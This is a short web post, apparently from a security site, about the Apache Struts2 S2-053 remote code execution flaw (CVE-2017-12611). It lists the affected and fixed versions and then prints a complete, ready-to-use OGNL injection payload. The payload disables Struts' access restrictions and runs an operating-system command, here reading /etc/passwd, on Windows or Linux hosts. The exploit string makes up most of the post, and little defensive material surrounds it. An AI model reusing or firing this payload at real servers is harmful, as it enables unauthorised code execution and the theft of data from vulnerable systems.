Exploit CVE-2017-12611: Apache Struts2 (S2-053) remote code execution vulnerability
What is CVE-2017-12611?
When using expression literals or forcing expression in Freemarker tags and using request values RCE attacks are possible. The value attribute in Freemarker tags should not be configured to be initialized by literals or expressions that can be modified, as Freemarker will treat them as expressions leading to possible remote code execution.
Affected version:
- Struts 2.0.1 – Struts 2.3.33
- Struts 2.5 – Struts 2.5.10
Unaffected version
- Struts 2.3.34
- Struts 2.5.12
How to fix, please read this post.
[adsense size='1']
Exploit
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘cat /etc/passwd‘).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
Gloss